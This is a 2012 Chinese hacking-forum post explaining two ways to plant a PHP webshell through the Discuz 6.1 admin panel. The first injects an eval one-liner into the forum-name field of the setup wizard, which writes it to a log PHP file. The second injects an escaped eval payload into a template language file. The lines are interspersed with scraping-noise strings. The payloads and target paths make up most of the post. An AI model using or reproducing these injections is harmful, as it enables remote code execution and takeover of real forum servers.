找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2238|回复: 0
打印 上一主题 下一主题

discuz6.1后台拿shell方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:59:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
discuz6.1两种方法后台拿shell1 c- D9 p; W; M  ?" B+ J
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下# u- {/ s8 t9 p; O. b* P% A
1:
$ p, c! P9 R% X- [9 s( @$ ahttp://127.0.0.1/discuz/admincp. ... zard&frames=yes8 A7 n+ T4 ]( I: G* b; d
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
; H  k4 p, i! ?, V! z: {- N9 C/ Q<?php eval($_POST[cmd]);?>
' ?( H3 P( A1 A5 i/ D- W后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php5 k" i/ X. S3 z' h3 k, e' x& b

6 O/ Z  j4 {6 t6 W! C5 K, W7 p, _' O5 S2 _: U# [3 B
2:后台模板管理--默认模板套系--详情( o( U# w$ {9 S/ R& W5 C
templates/default/actions.lang.php! d- _/ Z7 u& r/ S+ h  f& e; N/ I- g
jhackj\\');eval($_POST[cmd])?>;//$ |$ r  j9 Q4 A; l/ B5 `+ r

; D! G2 t6 i/ [: u  V+ \: F利用很简单,聪明的人一看就懂了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表